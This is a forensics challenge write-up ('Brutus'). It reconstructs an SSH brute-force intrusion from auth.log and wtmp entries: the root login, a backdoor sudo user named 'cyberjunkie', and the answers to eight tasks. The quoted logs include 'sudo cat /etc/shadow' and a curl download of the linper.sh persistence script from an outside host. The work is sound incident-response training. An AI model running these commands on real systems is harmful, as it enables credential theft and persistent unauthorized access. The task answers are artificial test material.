Brutus (Very Easy)
Scenario
In this very easy Sherlock, you will familiarize yourself with Unix auth.log and wtmp logs. We'll explore a scenario where a Confluence server was brute-forced via its SSH service. After gaining access to the server, the attacker performed additional activities, which we can track using auth.log. Although auth.log is primarily used for brute-force analysis, we will delve into the full potential of this artifact in our investigation, including aspects of privilege escalation, persistence, and even some visibility into command execution.
Analysis
Checking the file types:
auth.log: ASCII text
wtmp: data
Initial Access
Checking the auth log and geting the logs related to attacker and its activities: Logs for bruteforcing into multiple users.
Mar 6 06:31:31 ip-172-31-35-28 sshd[2325]: Invalid user admin from 65.2.161.68 port 46380
Mar 6 06:31:31 ip-172-31-35-28 sshd[2325]: Received disconnect from 65.2.161.68 port 46380:11: Bye Bye [preauth]
Mar 6 06:31:31 ip-172-31-35-28 sshd[2325]: Disconnected from invalid user admin 65.2.161.68 port 46380 [preauth]
Mar 6 06:31:31 ip-172-31-35-28 sshd[620]: error: beginning MaxStartups throttling
Mar 6 06:31:31 ip-172-31-35-28 sshd[620]: drop connection #10 from [65.2.161.68]:46482 on [172.31.35.28]:22 past MaxStartups
Mar 6 06:31:31 ip-172-31-35-28 sshd[2327]: Invalid user admin from 65.2.161.68 port 46392
Mar 6 06:31:31 ip-172-31-35-28 sshd[2331]: pam_unix(sshd:auth): check pass; user unknown
Mar 6 06:31:31 ip-172-31-35-28 sshd[2331]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.2.161.68
Mar 6 06:31:31 ip-172-31-35-28 sshd[2330]: Invalid user admin from 65.2.161.68 port 46422
Mar 6 06:31:31 ip-172-31-35-28 sshd[2337]: Invalid user admin from 65.2.161.68 port 46498
Mar 6 06:31:31 ip-172-31-35-28 sshd[2328]: Invalid user admin from 65.2.161.68 port 46390
Mar 6 06:31:32 ip-172-31-35-28 sshd[2357]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.2.161.68 user=backup
Mar 6 06:31:35 ip-172-31-35-28 sshd[2377]: Invalid user server_adm from 65.2.161.68 port 46684
Mar 6 06:31:39 ip-172-31-35-28 sshd[2396]: Failed password for invalid user svc_account from 65.2.161.68 port 46800 ssh2
Finally they were able to login as root.
...
Mar 6 06:32:44 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2
Mar 6 06:32:44 ip-172-31-35-28 sshd[2491]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Mar 6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root.
Checking the logs from the wtmp:
$ sudo last -F -f ./wtmp
cyberjun pts/1 65.2.161.68 Wed Mar 6 06:37:35 2024 gone - no logout
root pts/1 65.2.161.68 Wed Mar 6 06:32:45 2024 - Wed Mar 6 06:37:24 2024 (00:04)
root pts/0 203.101.190.9 Wed Mar 6 06:19:55 2024 gone - no logout
reboot system boot 6.2.0-1018-aws Wed Mar 6 06:17:15 2024 still running
root pts/1 203.101.190.9 Sun Feb 11 10:54:27 2024 - Sun Feb 11 11:08:04 2024 (00:13)
root pts/1 203.101.190.9 Sun Feb 11 10:41:11 2024 - Sun Feb 11 10:41:46 2024 (00:00)
root pts/0 203.101.190.9 Sun Feb 11 10:33:49 2024 - Sun Feb 11 11:08:04 2024 (00:34)
root pts/0 203.101.190.9 Thu Jan 25 11:15:40 2024 - Thu Jan 25 12:34:34 2024 (01:18)
ubuntu pts/0 203.101.190.9 Thu Jan 25 11:13:58 2024 - Thu Jan 25 11:15:12 2024 (00:01)
reboot system boot 6.2.0-1017-aws Thu Jan 25 11:12:17 2024 - Sun Feb 11 11:09:18 2024 (16+23:57)
wtmp begins Thu Jan 25 11:12:17 2024
Looks like the attacker started the session at Wed Mar 6 06:32:45 2024 from their IP 65.2.161.68.
Based on the logs, we can now answer some questions.
Task 1: Analyzing the auth.log, can you identify the IP address used by the attacker to carry out a brute force attack?
65.2.161.68
Task 2: The brute force attempts were successful, and the attacker gained access to an account on the server. What is the username of this account?
root
Task 3: Can you identify the timestamp when the attacker manually logged in to the server to carry out their objectives?
2024-03-06 06:32:45
Task 4: SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker's session for the user account from Question 2?
37
Attack
Looks like they create new group and user and also give root access to that user:
Mar 6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/group: name=cyberjunkie, GID=1002
Mar 6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/gshadow: name=cyberjunkie
Mar 6 06:34:18 ip-172-31-35-28 groupadd[2586]: new group: name=cyberjunkie, GID=1002
Mar 6 06:34:18 ip-172-31-35-28 useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts/1
Mar 6 06:34:26 ip-172-31-35-28 passwd[2603]: pam_unix(passwd:chauthtok): password changed for cyberjunkie
Mar 6 06:34:31 ip-172-31-35-28 chfn[2605]: changed user 'cyberjunkie' information
...
Mar 6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to group 'sudo'
Mar 6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to shadow group 'sudo'
...
Mar 6 06:37:24 ip-172-31-35-28 sshd[2491]: Received disconnect from 65.2.161.68 port 53184:11: disconnected by user
Mar 6 06:37:24 ip-172-31-35-28 sshd[2491]: Disconnected from user root 65.2.161.68 port 53184
Mar 6 06:37:24 ip-172-31-35-28 sshd[2491]: pam_unix(sshd:session): session closed for user root
Searching online about this MITRE ATT&CK sub-technique for creating a new user and making them root, we get https://attack.mitre.org/techniques/T1136/001/. Looks like they ended their session at 06:37:24.
Attack then moved to starting a new session as cyberjunkie to access that /etc/shadow file and other activies.
Mar 6 06:37:34 ip-172-31-35-28 sshd[2667]: Accepted password for cyberjunkie from 65.2.161.68 port 43260 ssh2
Mar 6 06:37:34 ip-172-31-35-28 sshd[2667]: pam_unix(sshd:session): session opened for user cyberjunkie(uid=1002) by (uid=0)
Mar 6 06:37:57 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/cat /etc/shadow
...
Mar 6 06:37:57 ip-172-31-35-28 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by cyberjunkie(uid=1002)
...
Mar 6 06:39:38 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
Answering the questions based on data collected.
Task 5: The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?
cyberjunkie
Task 6: What is the MITRE ATT&CK sub-technique ID used for persistence?
T1136.001
Task 7: How long did the attacker's first SSH session last based on the previously confirmed authentication time and session ending within the auth.log? (seconds)
279
Task 8: The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?
/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh